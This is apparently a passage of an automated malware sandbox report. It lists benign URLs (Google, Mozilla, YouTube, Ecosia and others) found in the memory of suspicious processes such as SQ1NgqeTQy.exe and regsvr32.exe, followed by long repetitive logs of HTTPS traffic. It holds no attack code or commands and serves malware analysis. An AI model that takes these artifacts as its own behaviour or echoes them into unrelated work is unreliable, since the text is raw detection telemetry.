Source: SQ1NgqeTQy.exe, 00000000.00000003.2092219917.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SQ1NgqeTQy.exe, 00000000.00000003.2092219917.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000035.00000002.3656053524.0000534400BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000035.00000002.3656053524.0000534400BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000035.00000002.3656053524.0000534400BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000035.00000003.3409275292.0000534400EB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000035.00000002.3652511992.000053440082C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/CharPk3
Source: chrome.exe, 00000035.00000002.3583674624.00005344003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000035.00000003.3407265823.0000534401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3652511992.000053440082C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000035.00000003.3407265823.0000534401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3652511992.000053440082C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3655587126.0000534400B7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000035.00000002.3655587126.0000534400B7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icocStateWorks
Source: chrome.exe, 00000035.00000002.3584006636.0000534400454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000035.00000002.3584006636.0000534400454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: chrome.exe, 00000035.00000002.3584711260.00005344004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000035.00000002.3662791378.0000534401414000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000035.00000003.3429361028.000053440140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3429302566.00005344010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3429922554.00005344014A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3429623083.00005344013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3662791378.0000534401414000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000035.00000003.3429623083.00005344013AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.GeV8o4Zu9xM.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000035.00000003.3429623083.00005344013AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.ibLFXwX0rCY.L.W.O/m=qmd
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: SQ1NgqeTQy.exe, 00000000.00000003.2091858077.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: f35b37b5a5.exe, 00000017.00000003.2702568906.000000000164D000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaSD
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaoglSD
Source: chrome.exe, 00000035.00000002.3660230513.0000534400EE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000035.00000002.3581577635.00005344000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 50319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 50226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50279
Source: unknown	Network traffic detected: HTTP traffic on port 50265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50283
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50284
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50286
Source: unknown	Network traffic detected: HTTP traffic on port 50220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50216
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50215
Source: unknown	Network traffic detected: HTTP traffic on port 50254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50219
Source: unknown	Network traffic detected: HTTP traffic on port 50283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 50248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50235
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown	Network traffic detected: HTTP traffic on port 50312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50250
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 50321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 50322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 50228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
